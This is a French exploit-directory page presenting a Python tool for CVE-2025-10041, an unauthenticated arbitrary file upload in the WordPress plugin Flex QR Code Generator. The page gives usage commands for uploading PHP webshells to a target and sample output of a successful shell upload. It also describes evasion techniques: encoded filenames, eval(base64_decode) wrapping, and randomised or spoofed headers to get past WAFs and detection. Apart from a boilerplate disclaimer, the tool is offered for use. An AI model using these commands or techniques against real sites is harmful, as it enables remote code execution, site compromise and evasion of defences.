Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - Téléversement arbitraire de fichiers non authentifié | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-10041
Génération de PayloadsAnalyse des VulnérabilitésExploitationÉvasion IDS/IPSExploitation d'Applications WebContournement de WAF
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Téléversement arbitraire de fichiers non authentifié

Voir le dépôt
33il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - Téléchargement arbitraire de fichiers sans authentification

🚨 Flex QR Code Generator ≤ 1.2.5 - Téléchargement arbitraire de fichiers sans authentification


📝 Description

Le plugin Flex QR Code Generator pour WordPress est vulnérable au téléchargement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans la fonction save_qr_code_to_db() dans toutes les versions jusqu'à la version 1.2.5 incluse.
Cela permet à des attaquants non authentifiés de télécharger des fichiers malveillants sur le serveur du site concerné, ce qui peut potentiellement conduire à une exécution de code à distance.

  • CVE : CVE-2025-10041
  • CVSS : 9.8 (Critique)

💡 À propos de ce script

CVE-2025-10041.py est un outil d'exploitation professionnel conçu pour automatiser l'attaque en exploitant cette vulnérabilité.
Il offre des fonctionnalités avancées pour contourner les protections courantes et les techniques d'encodage.


⚙️ Fonctionnalités

  • Détection automatique de la vulnérabilité (vérification de version)
  • Téléchargement arbitraire de fichiers (y compris les webshells PHP)
  • Contournement par encodage du nom de fichier : encodage Base64 ou URL
  • Contournement par encodage du contenu : wrapper PHP base64 pour le code du shell
  • En-têtes HTTP aléatoires pour contourner les WAF basiques
  • Prise en charge d'en-têtes personnalisés
  • Interface en ligne de commande complète avec analyse des arguments et message d'aide

🖥️ Utilisation

1. Exploitation de base

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. Encodage du nom du shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. Encodage du contenu du shell

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. Nom de fichier de shell personnalisé

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. Avancé (combiner les options)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. En-têtes personnalisés

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 Aide

Pour voir toutes les options disponibles et les instructions d'utilisation :

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 Techniques de contournement

  • Encodage du nom de fichier : certains serveurs bloquent .php ou les noms suspects ; l'encodage peut contourner les filtres.
  • Encodage du contenu : encapsuler le code du shell dans eval(base64_decode(...)) peut contourner les filtres de contenu.
  • En-têtes aléatoires : rotation du user-agent, du referer et des cookies pour éviter la détection.
  • En-têtes personnalisés : ajoutez vos propres en-têtes pour un contournement avancé.

📋 Exemple de sortie

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ Avertissement

Ce script est fourni uniquement à des fins éducatives, de recherche et de tests d'intrusion autorisés.
Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas explicitement l'autorisation de tester est strictement interdite et illégale.
L'auteur n'est pas responsable de tout usage abusif ou des dommages causés par cet outil.


✍️ Par :

Nxploited (Khaled Alenazi)


Télécharger l’outil